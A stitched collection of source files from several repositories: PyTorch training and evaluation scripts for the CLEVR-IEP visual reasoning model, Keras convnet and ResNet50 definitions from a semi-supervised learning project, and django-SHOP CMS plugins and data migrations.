dtype = torch.FloatTensor
if args.use_gpu == 1:
dtype = torch.cuda.FloatTensor
if type(model) is tuple:
program_generator, execution_engine = model
run_our_model_batch(args, program_generator, execution_engine, loader, dtype)
else:
run_baseline_batch(args, model, loader, dtype)
def run_baseline_batch(args, model, loader, dtype):
model.type(dtype)
model.eval()
all_scores, all_probs = [], []
num_correct, num_samples = 0, 0
for batch in loader:
questions, images, feats, answers, programs, program_lists = batch
questions_var = Variable(questions.type(dtype).long(), volatile=True)
feats_var = Variable(feats.type(dtype), volatile=True)
scores = model(questions_var, feats_var)
probs = F.softmax(scores)
_, preds = scores.data.cpu().max(1)
all_scores.append(scores.data.cpu().clone())
all_probs.append(probs.data.cpu().clone())
num_correct += (preds == answers).sum()
num_samples += preds.size(0)
print('Ran %d samples' % num_samples)
acc = float(num_correct) / num_samples
print('Got %d / %d = %.2f correct' % (num_correct, num_samples, 100 * acc))
all_scores = torch.cat(all_scores, 0)
all_probs = torch.cat(all_probs, 0)
if args.output_h5 is not None:
print('Writing output to %s' % args.output_h5)
with h5py.File(args.output_h5, 'w') as fout:
fout.create_dataset('scores', data=all_scores.numpy())
fout.create_dataset('probs', data=all_probs.numpy())
def run_our_model_batch(args, program_generator, execution_engine, loader, dtype):
program_generator.type(dtype)
program_generator.eval()
execution_engine.type(dtype)
execution_engine.eval()
all_scores, all_programs = [], []
all_probs = []
num_correct, num_samples = 0, 0
for batch in loader:
questions, images, feats, answers, programs, program_lists = batch
questions_var = Variable(questions.type(dtype).long(), volatile=True)
feats_var = Variable(feats.type(dtype), volatile=True)
programs_pred = program_generator.reinforce_sample(
questions_var,
temperature=args.temperature,
argmax=(args.sample_argmax == 1))
if args.use_gt_programs == 1:
scores = execution_engine(feats_var, program_lists)
else:
scores = execution_engine(feats_var, programs_pred)
probs = F.softmax(scores)
_, preds = scores.data.cpu().max(1)
all_programs.append(programs_pred.data.cpu().clone())
all_scores.append(scores.data.cpu().clone())
all_probs.append(probs.data.cpu().clone())
num_correct += (preds == answers).sum()
num_samples += preds.size(0)
print('Ran %d samples' % num_samples)
acc = float(num_correct) / num_samples
print('Got %d / %d = %.2f correct' % (num_correct, num_samples, 100 * acc))
all_scores = torch.cat(all_scores, 0)
all_probs = torch.cat(all_probs, 0)
all_programs = torch.cat(all_programs, 0)
if args.output_h5 is not None:
print('Writing output to "%s"' % args.output_h5)
with h5py.File(args.output_h5, 'w') as fout:
fout.create_dataset('scores', data=all_scores.numpy())
fout.create_dataset('probs', data=all_probs.numpy())
fout.create_dataset('predicted_programs', data=all_programs.numpy())
if __name__ == '__main__':
args = parser.parse_args()
main(args)
```
#### File: clevr-iep/scripts/train_model.py
```python
import sys
import os
import argparse
import json
import random
import shutil
import torch
torch.backends.cudnn.enabled = True
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
import h5py
import iep.utils as utils
import iep.preprocess
from iep.data import ClevrDataset, ClevrDataLoader
from iep.models import ModuleNet, Seq2Seq, LstmModel, CnnLstmModel, CnnLstmSaModel
parser = argparse.ArgumentParser()
# Input data
parser.add_argument('--train_question_h5', default='data/train_questions.h5')
parser.add_argument('--train_features_h5', default='data/train_features.h5')
parser.add_argument('--val_question_h5', default='data/val_questions.h5')
parser.add_argument('--val_features_h5', default='data/val_features.h5')
parser.add_argument('--feature_dim', default='1024,14,14')
parser.add_argument('--vocab_json', default='data/vocab.json')
parser.add_argument('--loader_num_workers', type=int, default=1)
parser.add_argument('--use_local_copies', default=0, type=int)
parser.add_argument('--cleanup_local_copies', default=1, type=int)
parser.add_argument('--family_split_file', default=None)
parser.add_argument('--num_train_samples', default=None, type=int)
parser.add_argument('--num_val_samples', default=10000, type=int)
parser.add_argument('--shuffle_train_data', default=1, type=int)
# What type of model to use and which parts to train
parser.add_argument('--model_type', default='PG',
choices=['PG', 'EE', 'PG+EE', 'LSTM', 'CNN+LSTM', 'CNN+LSTM+SA'])
parser.add_argument('--train_program_generator', default=1, type=int)
parser.add_argument('--train_execution_engine', default=1, type=int)
parser.add_argument('--baseline_train_only_rnn', default=0, type=int)
# Start from an existing checkpoint
parser.add_argument('--program_generator_start_from', default=None)
parser.add_argument('--execution_engine_start_from', default=None)
parser.add_argument('--baseline_start_from', default=None)
# RNN options
parser.add_argument('--rnn_wordvec_dim', default=300, type=int)
parser.add_argument('--rnn_hidden_dim', default=256, type=int)
parser.add_argument('--rnn_num_layers', default=2, type=int)
parser.add_argument('--rnn_dropout', default=0, type=float)
# Module net options
parser.add_argument('--module_stem_num_layers', default=2, type=int)
parser.add_argument('--module_stem_batchnorm', default=0, type=int)
parser.add_argument('--module_dim', default=128, type=int)
parser.add_argument('--module_residual', default=1, type=int)
parser.add_argument('--module_batchnorm', default=0, type=int)
# CNN options (for baselines)
parser.add_argument('--cnn_res_block_dim', default=128, type=int)
parser.add_argument('--cnn_num_res_blocks', default=0, type=int)
parser.add_argument('--cnn_proj_dim', default=512, type=int)
parser.add_argument('--cnn_pooling', default='maxpool2',
choices=['none', 'maxpool2'])
# Stacked-Attention options
parser.add_argument('--stacked_attn_dim', default=512, type=int)
parser.add_argument('--num_stacked_attn', default=2, type=int)
# Classifier options
parser.add_argument('--classifier_proj_dim', default=512, type=int)
parser.add_argument('--classifier_downsample', default='maxpool2',
choices=['maxpool2', 'maxpool4', 'none'])
parser.add_argument('--classifier_fc_dims', default='1024')
parser.add_argument('--classifier_batchnorm', default=0, type=int)
parser.add_argument('--classifier_dropout', default=0, type=float)
# Optimization options
parser.add_argument('--batch_size', default=64, type=int)
parser.add_argument('--num_iterations', default=100000, type=int)
parser.add_argument('--learning_rate', default=5e-4, type=float)
parser.add_argument('--reward_decay', default=0.9, type=float)
# Output options
parser.add_argument('--checkpoint_path', default='data/checkpoint.pt')
parser.add_argument('--randomize_checkpoint_path', type=int, default=0)
parser.add_argument('--record_loss_every', type=int, default=1)
parser.add_argument('--checkpoint_every', default=10000, type=int)
def main(args):
if args.randomize_checkpoint_path == 1:
name, ext = os.path.splitext(args.checkpoint_path)
num = random.randint(1, 1000000)
args.checkpoint_path = '%s_%06d%s' % (name, num, ext)
vocab = utils.load_vocab(args.vocab_json)
if args.use_local_copies == 1:
shutil.copy(args.train_question_h5, '/tmp/train_questions.h5')
shutil.copy(args.train_features_h5, '/tmp/train_features.h5')
shutil.copy(args.val_question_h5, '/tmp/val_questions.h5')
shutil.copy(args.val_features_h5, '/tmp/val_features.h5')
args.train_question_h5 = '/tmp/train_questions.h5'
args.train_features_h5 = '/tmp/train_features.h5'
args.val_question_h5 = '/tmp/val_questions.h5'
args.val_features_h5 = '/tmp/val_features.h5'
question_families = None
if args.family_split_file is not None:
with open(args.family_split_file, 'r') as f:
question_families = json.load(f)
train_loader_kwargs = {
'question_h5': args.train_question_h5,
'feature_h5': args.train_features_h5,
'vocab': vocab,
'batch_size': args.batch_size,
'shuffle': args.shuffle_train_data == 1,
'question_families': question_families,
'max_samples': args.num_train_samples,
'num_workers': args.loader_num_workers,
}
val_loader_kwargs = {
'question_h5': args.val_question_h5,
'feature_h5': args.val_features_h5,
'vocab': vocab,
'batch_size': args.batch_size,
'question_families': question_families,
'max_samples': args.num_val_samples,
'num_workers': args.loader_num_workers,
}
with ClevrDataLoader(**train_loader_kwargs) as train_loader, \
ClevrDataLoader(**val_loader_kwargs) as val_loader:
train_loop(args, train_loader, val_loader)
if args.use_local_copies == 1 and args.cleanup_local_copies == 1:
os.remove('/tmp/train_questions.h5')
os.remove('/tmp/train_features.h5')
os.remove('/tmp/val_questions.h5')
os.remove('/tmp/val_features.h5')
def train_loop(args, train_loader, val_loader):
vocab = utils.load_vocab(args.vocab_json)
program_generator, pg_kwargs, pg_optimizer = None, None, None
execution_engine, ee_kwargs, ee_optimizer = None, None, None
baseline_model, baseline_kwargs, baseline_optimizer = None, None, None
baseline_type = None
best_pg_state, best_ee_state, best_baseline_state = None, None, None
# Set up model
if args.model_type == 'PG' or args.model_type == 'PG+EE':
program_generator, pg_kwargs = get_program_generator(args)
pg_optimizer = torch.optim.Adam(program_generator.parameters(),
lr=args.learning_rate)
print('Here is the program generator:')
print(program_generator)
if args.model_type == 'EE' or args.model_type == 'PG+EE':
execution_engine, ee_kwargs = get_execution_engine(args)
ee_optimizer = torch.optim.Adam(execution_engine.parameters(),
lr=args.learning_rate)
print('Here is the execution engine:')
print(execution_engine)
if args.model_type in ['LSTM', 'CNN+LSTM', 'CNN+LSTM+SA']:
baseline_model, baseline_kwargs = get_baseline_model(args)
params = baseline_model.parameters()
if args.baseline_train_only_rnn == 1:
params = baseline_model.rnn.parameters()
baseline_optimizer = torch.optim.Adam(params, lr=args.learning_rate)
print('Here is the baseline model')
print(baseline_model)
baseline_type = args.model_type
loss_fn = torch.nn.CrossEntropyLoss().cuda()
stats = {
'train_losses': [], 'train_rewards': [], 'train_losses_ts': [],
'train_accs': [], 'val_accs': [], 'val_accs_ts': [],
'best_val_acc': -1, 'model_t': 0,
}
t, epoch, reward_moving_average = 0, 0, 0
set_mode('train', [program_generator, execution_engine, baseline_model])
print('train_loader has %d samples' % len(train_loader.dataset))
print('val_loader has %d samples' % len(val_loader.dataset))
while t < args.num_iterations:
epoch += 1
print('Starting epoch %d' % epoch)
for batch in train_loader:
t += 1
questions, _, feats, answers, programs, _ = batch
questions_var = Variable(questions.cuda())
feats_var = Variable(feats.cuda())
answers_var = Variable(answers.cuda())
if programs[0] is not None:
programs_var = Variable(programs.cuda())
reward = None
if args.model_type == 'PG':
# Train program generator with ground-truth programs
pg_optimizer.zero_grad()
loss = program_generator(questions_var, programs_var)
loss.backward()
pg_optimizer.step()
elif args.model_type == 'EE':
# Train execution engine with ground-truth programs
ee_optimizer.zero_grad()
scores = execution_engine(feats_var, programs_var)
loss = loss_fn(scores, answers_var)
loss.backward()
ee_optimizer.step()
elif args.model_type in ['LSTM', 'CNN+LSTM', 'CNN+LSTM+SA']:
baseline_optimizer.zero_grad()
baseline_model.zero_grad()
scores = baseline_model(questions_var, feats_var)
loss = loss_fn(scores, answers_var)
loss.backward()
baseline_optimizer.step()
elif args.model_type == 'PG+EE':
programs_pred = program_generator.reinforce_sample(questions_var)
scores = execution_engine(feats_var, programs_pred)
loss = loss_fn(scores, answers_var)
_, preds = scores.data.cpu().max(1)
raw_reward = (preds == answers).float()
reward_moving_average *= args.reward_decay
reward_moving_average += (1.0 - args.reward_decay) * raw_reward.mean()
centered_reward = raw_reward - reward_moving_average
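# REINFORCE with a moving-average baseline: the execution engine receives the usual
# cross-entropy gradient, while the program generator is updated with the centered reward
# (per-sample correctness minus the running average) as its policy-gradient signal.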
if args.train_execution_engine == 1:
ee_optimizer.zero_grad()
loss.backward()
ee_optimizer.step()
if args.train_program_generator == 1:
pg_optimizer.zero_grad()
program_generator.reinforce_backward(centered_reward.cuda())
pg_optimizer.step()
if t % args.record_loss_every == 0:
print(t, loss.data[0])
stats['train_losses'].append(loss.data[0])
stats['train_losses_ts'].append(t)
if reward is not None:
stats['train_rewards'].append(reward)
if t % args.checkpoint_every == 0:
print('Checking training accuracy ... ')
train_acc = check_accuracy(args, program_generator, execution_engine,
baseline_model, train_loader)
print('train accuracy is', train_acc)
print('Checking validation accuracy ...')
val_acc = check_accuracy(args, program_generator, execution_engine,
baseline_model, val_loader)
print('val accuracy is ', val_acc)
stats['train_accs'].append(train_acc)
stats['val_accs'].append(val_acc)
stats['val_accs_ts'].append(t)
if val_acc > stats['best_val_acc']:
stats['best_val_acc'] = val_acc
stats['model_t'] = t
best_pg_state = get_state(program_generator)
best_ee_state = get_state(execution_engine)
best_baseline_state = get_state(baseline_model)
checkpoint = {
'args': args.__dict__,
'program_generator_kwargs': pg_kwargs,
'program_generator_state': best_pg_state,
'execution_engine_kwargs': ee_kwargs,
'execution_engine_state': best_ee_state,
'baseline_kwargs': baseline_kwargs,
'baseline_state': best_baseline_state,
'baseline_type': baseline_type,
'vocab': vocab
}
for k, v in stats.items():
checkpoint[k] = v
print('Saving checkpoint to %s' % args.checkpoint_path)
torch.save(checkpoint, args.checkpoint_path)
del checkpoint['program_generator_state']
del checkpoint['execution_engine_state']
del checkpoint['baseline_state']
with open(args.checkpoint_path + '.json', 'w') as f:
json.dump(checkpoint, f)
if t == args.num_iterations:
break
def parse_int_list(s):
return tuple(int(n) for n in s.split(','))
def get_state(m):
if m is None:
return None
state = {}
for k, v in m.state_dict().items():
state[k] = v.clone()
return state
def get_program_generator(args):
vocab = utils.load_vocab(args.vocab_json)
if args.program_generator_start_from is not None:
pg, kwargs = utils.load_program_generator(args.program_generator_start_from)
cur_vocab_size = pg.encoder_embed.weight.size(0)
if cur_vocab_size != len(vocab['question_token_to_idx']):
print('Expanding vocabulary of program generator')
pg.expand_encoder_vocab(vocab['question_token_to_idx'])
kwargs['encoder_vocab_size'] = len(vocab['question_token_to_idx'])
else:
kwargs = {
'encoder_vocab_size': len(vocab['question_token_to_idx']),
'decoder_vocab_size': len(vocab['program_token_to_idx']),
'wordvec_dim': args.rnn_wordvec_dim,
'hidden_dim': args.rnn_hidden_dim,
'rnn_num_layers': args.rnn_num_layers,
'rnn_dropout': args.rnn_dropout,
}
pg = Seq2Seq(**kwargs)
pg.cuda()
pg.train()
return pg, kwargs
def get_execution_engine(args):
vocab = utils.load_vocab(args.vocab_json)
if args.execution_engine_start_from is not None:
ee, kwargs = utils.load_execution_engine(args.execution_engine_start_from)
# TODO: Adjust vocab?
else:
kwargs = {
'vocab': vocab,
'feature_dim': parse_int_list(args.feature_dim),
'stem_batchnorm': args.module_stem_batchnorm == 1,
'stem_num_layers': args.module_stem_num_layers,
'module_dim': args.module_dim,
'module_residual': args.module_residual == 1,
'module_batchnorm': args.module_batchnorm == 1,
'classifier_proj_dim': args.classifier_proj_dim,
'classifier_downsample': args.classifier_downsample,
'classifier_fc_layers': parse_int_list(args.classifier_fc_dims),
'classifier_batchnorm': args.classifier_batchnorm == 1,
'classifier_dropout': args.classifier_dropout,
}
ee = ModuleNet(**kwargs)
ee.cuda()
ee.train()
return ee, kwargs
def get_baseline_model(args):
vocab = utils.load_vocab(args.vocab_json)
if args.baseline_start_from is not None:
model, kwargs = utils.load_baseline(args.baseline_start_from)
elif args.model_type == 'LSTM':
kwargs = {
'vocab': vocab,
'rnn_wordvec_dim': args.rnn_wordvec_dim,
'rnn_dim': args.rnn_hidden_dim,
'rnn_num_layers': args.rnn_num_layers,
'rnn_dropout': args.rnn_dropout,
'fc_dims': parse_int_list(args.classifier_fc_dims),
'fc_use_batchnorm': args.classifier_batchnorm == 1,
'fc_dropout': args.classifier_dropout,
}
model = LstmModel(**kwargs)
elif args.model_type == 'CNN+LSTM':
kwargs = {
'vocab': vocab,
'rnn_wordvec_dim': args.rnn_wordvec_dim,
'rnn_dim': args.rnn_hidden_dim,
'rnn_num_layers': args.rnn_num_layers,
'rnn_dropout': args.rnn_dropout,
'cnn_feat_dim': parse_int_list(args.feature_dim),
'cnn_num_res_blocks': args.cnn_num_res_blocks,
'cnn_res_block_dim': args.cnn_res_block_dim,
'cnn_proj_dim': args.cnn_proj_dim,
'cnn_pooling': args.cnn_pooling,
'fc_dims': parse_int_list(args.classifier_fc_dims),
'fc_use_batchnorm': args.classifier_batchnorm == 1,
'fc_dropout': args.classifier_dropout,
}
model = CnnLstmModel(**kwargs)
elif args.model_type == 'CNN+LSTM+SA':
kwargs = {
'vocab': vocab,
'rnn_wordvec_dim': args.rnn_wordvec_dim,
'rnn_dim': args.rnn_hidden_dim,
'rnn_num_layers': args.rnn_num_layers,
'rnn_dropout': args.rnn_dropout,
'cnn_feat_dim': parse_int_list(args.feature_dim),
'stacked_attn_dim': args.stacked_attn_dim,
'num_stacked_attn': args.num_stacked_attn,
'fc_dims': parse_int_list(args.classifier_fc_dims),
'fc_use_batchnorm': args.classifier_batchnorm == 1,
'fc_dropout': args.classifier_dropout,
}
model = CnnLstmSaModel(**kwargs)
if model.rnn.token_to_idx != vocab['question_token_to_idx']:
# Make sure new vocab is superset of old
for k, v in model.rnn.token_to_idx.items():
assert k in vocab['question_token_to_idx']
assert vocab['question_token_to_idx'][k] == v
for token, idx in vocab['question_token_to_idx'].items():
model.rnn.token_to_idx[token] = idx
kwargs['vocab'] = vocab
model.rnn.expand_vocab(vocab['question_token_to_idx'])
model.cuda()
model.train()
return model, kwargs
def set_mode(mode, models):
assert mode in ['train', 'eval']
for m in models:
if m is None: continue
if mode == 'train': m.train()
if mode == 'eval': m.eval()
def check_accuracy(args, program_generator, execution_engine, baseline_model, loader):
set_mode('eval', [program_generator, execution_engine, baseline_model])
num_correct, num_samples = 0, 0
for batch in loader:
questions, _, feats, answers, programs, _ = batch
questions_var = Variable(questions.cuda(), volatile=True)
feats_var = Variable(feats.cuda(), volatile=True)
answers_var = Variable(answers.cuda(), volatile=True)
if programs[0] is not None:
programs_var = Variable(programs.cuda(), volatile=True)
scores = None # Use this for everything but PG
if args.model_type == 'PG':
vocab = utils.load_vocab(args.vocab_json)
for i in range(questions.size(0)):
program_pred = program_generator.sample(Variable(questions[i:i+1].cuda(), volatile=True))
program_pred_str = iep.preprocess.decode(program_pred, vocab['program_idx_to_token'])
program_str = iep.preprocess.decode(programs[i], vocab['program_idx_to_token'])
if program_pred_str == program_str:
num_correct += 1
num_samples += 1
elif args.model_type == 'EE':
scores = execution_engine(feats_var, programs_var)
elif args.model_type == 'PG+EE':
programs_pred = program_generator.reinforce_sample(
questions_var, argmax=True)
scores = execution_engine(feats_var, programs_pred)
elif args.model_type in ['LSTM', 'CNN+LSTM', 'CNN+LSTM+SA']:
scores = baseline_model(questions_var, feats_var)
if scores is not None:
_, preds = scores.data.cpu().max(1)
num_correct += (preds == answers).sum()
num_samples += preds.size(0)
if num_samples >= args.num_val_samples:
break
set_mode('train', [program_generator, execution_engine, baseline_model])
acc = float(num_correct) / num_samples
return acc
if __name__ == '__main__':
args = parser.parse_args()
main(args)
``` |
{
"source": "2000222/S4L-Semi-supervised-learning",
"score": 3
} |
#### File: S4L-Semi-supervised-learning/networks/convnet.py
```python
from keras.models import Model
from keras.layers import Input, Conv2D, Dropout
from keras.layers import MaxPooling2D, LeakyReLU
from keras.layers import BatchNormalization
from keras.regularizers import l2
from keras import initializers
from keras import backend as K
seed_number = 1
# Non-linearity params
leakiness = 0.0
# Batchnorm params
mom = 0.99
eps = 0.001
gamma = 'ones'
# Convolution params
bias = True
weight_decay = 0.0005
initer = initializers.he_normal(seed=seed_number)
def create_model(input_shape, dropout=0.0):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
data = Input(shape=input_shape)
x = Conv2D(128, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(data)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(128, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(128, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = MaxPooling2D((2, 2), padding='same')(x)
if dropout > 0.0: x = Dropout(dropout)(x)
x = Conv2D(256, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(256, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(256, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = MaxPooling2D((2, 2), padding='same')(x)
if dropout > 0.0: x = Dropout(dropout)(x)
x = Conv2D(512, (3, 3), padding='valid', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(256, (1, 1), padding='valid', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(128, (1, 1), padding='valid', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
# Return output dimensions 6 x 6 x 128
model = Model(data, x, name='convnet_trunk')
return model
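# Minimal smoke test (assuming CIFAR-style 32x32x3 inputs; not part of the original file):
if __name__ == "__main__":
    model = create_model((32, 32, 3), dropout=0.5)
    print(model.output_shape)  # expected: (None, 6, 6, 128), matching the comment above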
```
#### File: S4L-Semi-supervised-learning/networks/resnet50v2.py
```python
import keras
from keras.models import Model
from keras.layers import Input, Conv2D, Dropout
from keras.layers import MaxPooling2D, LeakyReLU
from keras.layers import BatchNormalization
from keras.regularizers import l2
from keras import initializers
from keras import backend as K
from keras.layers import GlobalAveragePooling2D
from keras import applications
from keras.applications.resnet50 import ResNet50
seed_number = 1
# Non-linearity params
leakiness = 0.0
# Batchnorm params
mom = 0.99
eps = 0.001
gamma = 'ones'
# Convolution params
bias = False
weight_decay = 0.0005
initer = initializers.he_normal(seed=seed_number)
def create_model(input_shape):
#load the model
#module=hub.module("https://tfhub.dev/google/imagenet/resnet_v2_50/feature_vector/3")
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
input_tensor = Input(shape=input_shape)
base_model = ResNet50(include_top=False,
weights='imagenet',
input_tensor=input_tensor)
#base_model.load_weights('/content/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5')
x = base_model.output
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
model = Model(input_tensor,x,name = 'resnet50_trunk')
return model
``` |
{
"source": "2000charge/ap-python-sdk",
"score": 2
} |
#### File: app/views/home.py
```python
from django.http import HttpResponse
from django.template import loader
def index(request):
template = loader.get_template('home/index.html')
return HttpResponse(template.render({}, request))
``` |
{
"source": "2000-ion/TIDPP-Lab3",
"score": 2
} |
#### File: shop/cascade/catalog.py
```python
from django.contrib.admin import StackedInline
from django.forms import fields, widgets
from django.template.loader import select_template
from django.utils.translation import gettext_lazy as _, gettext
from entangled.forms import EntangledModelFormMixin, EntangledModelForm
from cms.plugin_pool import plugin_pool
from cms.utils.compat.dj import is_installed
from cmsplugin_cascade.mixins import WithSortableInlineElementsMixin
from cmsplugin_cascade.models import SortableInlineCascadeElement
from shop.cascade.plugin_base import ShopPluginBase, ProductSelectField
from shop.conf import app_settings
from shop.models.product import ProductModel
if is_installed('adminsortable2'):
from adminsortable2.admin import SortableInlineAdminMixin
else:
SortableInlineAdminMixin = type('SortableInlineAdminMixin', (object,), {})
class ShopCatalogPluginForm(EntangledModelFormMixin):
CHOICES = [
('paginator', _("Use Paginator")),
('manual', _("Manual Infinite")),
('auto', _("Auto Infinite")),
]
pagination = fields.ChoiceField(
choices=CHOICES,
widget=widgets.RadioSelect,
label=_("Pagination"),
initial='paginator',
help_text=_("Shall the product list view use a paginator or scroll infinitely?"),
)
class Meta:
entangled_fields = {'glossary': ['pagination']}
class ShopCatalogPlugin(ShopPluginBase):
name = _("Catalog List View")
require_parent = True
form = ShopCatalogPluginForm
parent_classes = ['BootstrapColumnPlugin', 'SimpleWrapperPlugin']
cache = False
def get_render_template(self, context, instance, placeholder):
templates = []
if instance.glossary.get('render_template'):
templates.append(instance.glossary['render_template'])
templates.extend([
'{}/catalog/list.html'.format(app_settings.APP_LABEL),
'shop/catalog/list.html',
])
return select_template(templates)
def render(self, context, instance, placeholder):
context['pagination'] = instance.glossary.get('pagination', 'paginator')
return context
@classmethod
def get_identifier(cls, obj):
pagination = obj.glossary.get('pagination')
if pagination == 'paginator':
return gettext("Manual Pagination")
return gettext("Infinite Scroll")
plugin_pool.register_plugin(ShopCatalogPlugin)
class ShopAddToCartPluginForm(EntangledModelFormMixin):
use_modal_dialog = fields.BooleanField(
label=_("Use Modal Dialog"),
initial=True,
required=False,
help_text=_("After adding product to cart, render a modal dialog"),
)
class Meta:
entangled_fields = {'glossary': ['use_modal_dialog']}
class ShopAddToCartPlugin(ShopPluginBase):
name = _("Add Product to Cart")
require_parent = True
form = ShopAddToCartPluginForm
parent_classes = ['BootstrapColumnPlugin']
cache = False
def get_render_template(self, context, instance, placeholder):
templates = []
if instance.glossary.get('render_template'):
templates.append(instance.glossary['render_template'])
if context['product'].managed_availability():
template_prefix = 'available-'
else:
template_prefix = ''
templates.extend([
'{}/catalog/{}product-add2cart.html'.format(app_settings.APP_LABEL, template_prefix),
'shop/catalog/{}product-add2cart.html'.format(template_prefix),
])
return select_template(templates)
def render(self, context, instance, placeholder):
context = super().render(context, instance, placeholder)
context['use_modal_dialog'] = bool(instance.glossary.get('use_modal_dialog', True))
return context
plugin_pool.register_plugin(ShopAddToCartPlugin)
class ProductGalleryForm(EntangledModelForm):
order = fields.IntegerField(
widget=widgets.HiddenInput,
initial=0,
)
product = ProductSelectField(
required=False,
label=_("Related Product"),
help_text=_("Choose related product"),
)
class Meta:
entangled_fields = {'glossary': ['product']}
untangled_fields = ['order']
class ProductGalleryInline(SortableInlineAdminMixin, StackedInline):
model = SortableInlineCascadeElement
form = ProductGalleryForm
extra = 5
ordering = ['order']
verbose_name = _("Product")
verbose_name_plural = _("Product Gallery")
class ShopProductGallery(WithSortableInlineElementsMixin, ShopPluginBase):
name = _("Product Gallery")
require_parent = True
parent_classes = ('BootstrapColumnPlugin',)
inlines = (ProductGalleryInline,)
# until this bug https://github.com/applegrew/django-select2/issues/65 is fixed
# we hide the "add row" button and instead use `extra = 5` in ProductGalleryInline
class Media:
css = {'all': ('shop/css/admin/product-gallery.css',)}
def get_render_template(self, context, instance, placeholder):
templates = []
if instance.glossary.get('render_template'):
templates.append(instance.glossary['render_template'])
templates.extend([
'{}/catalog/product-gallery.html'.format(app_settings.APP_LABEL),
'shop/catalog/product-gallery.html',
])
return select_template(templates)
def render(self, context, instance, placeholder):
product_ids = []
for inline in instance.sortinline_elements.all():
try:
product_ids.append(inline.glossary['product']['pk'])
except TypeError:
pass
queryset = ProductModel.objects.filter(pk__in=product_ids, active=True)
serializer_class = app_settings.PRODUCT_SUMMARY_SERIALIZER
serialized = serializer_class(queryset, many=True, context={'request': context['request']})
# sort the products according to the order provided by `sortinline_elements`.
context['products'] = [product for id in product_ids for product in serialized.data if product['id'] == id]
return context
plugin_pool.register_plugin(ShopProductGallery)
```
#### File: shop/migrations/0003_glossary_fields.py
```python
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
FIELD_MAPPINGS = {
'ProcessNextStepPlugin': [
('button-type', 'button_type'),
('button-size', 'button_size'),
('button-options', 'button_options'),
('quick-float', 'quick_float'),
('icon-left', 'icon_left'),
('icon-right', 'icon_right'),
],
'ShopProceedButton': [
('button-type', 'button_type'),
('button-size', 'button_size'),
('button-options', 'button_options'),
('quick-float', 'quick_float'),
('icon-left', 'icon_left'),
('icon-right', 'icon_right'),
],
}
def forwards(apps, schema_editor):
field_mappings = {}
for key, maps in FIELD_MAPPINGS.items():
field_mappings[key] = dict(maps)
migrate_glossary(apps, field_mappings)
def backwards(apps, schema_editor):
field_mappings = {}
for key, maps in FIELD_MAPPINGS.items():
field_mappings[key] = dict((m[1], m[0]) for m in maps)
migrate_glossary(apps, field_mappings)
def migrate_glossary(apps, field_mappings):
CascadeElement = apps.get_model('cmsplugin_cascade', 'CascadeElement')
for element in CascadeElement.objects.all():
if element.plugin_type not in field_mappings:
continue
glossary = dict(element.glossary)
for srckey, value in element.glossary.items():
dstkey = field_mappings[element.plugin_type].get(srckey)
if dstkey and srckey in glossary:
glossary[dstkey] = glossary.pop(srckey)
element.glossary = glossary
element.save()
class Migration(migrations.Migration):
dependencies = [
('shop', '0002_auto_20151016_1451'),
]
operations = []
if 'cmsplugin_cascade' in settings.INSTALLED_APPS:
dependencies.append(('cmsplugin_cascade', '0014_glossary_field'))
operations.append(migrations.RunPython(forwards, reverse_code=backwards))
```
#### File: shop/migrations/0005_unify_address.py
```python
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
def forwards(apps, schema_editor):
CascadeElement = apps.get_model('cmsplugin_cascade', 'CascadeElement')
for element in CascadeElement.objects.all():
if element.plugin_type == 'BillingAddressFormPlugin':
element.plugin_type = 'CheckoutAddressPlugin'
element.glossary['address_form'] = 'billing'
element.glossary['allow_use_primary'] = element.glossary.get('allow_use_shipping', '')
element.save()
elif element.plugin_type == 'ShippingAddressFormPlugin':
element.plugin_type = 'CheckoutAddressPlugin'
element.glossary['address_form'] = 'shipping'
element.save()
def backwards(apps, schema_editor):
CascadeElement = apps.get_model('cmsplugin_cascade', 'CascadeElement')
for element in CascadeElement.objects.all():
if element.plugin_type == 'CheckoutAddressPlugin':
if element.glossary['address_form'] == 'billing':
element.plugin_type = 'BillingAddressFormPlugin'
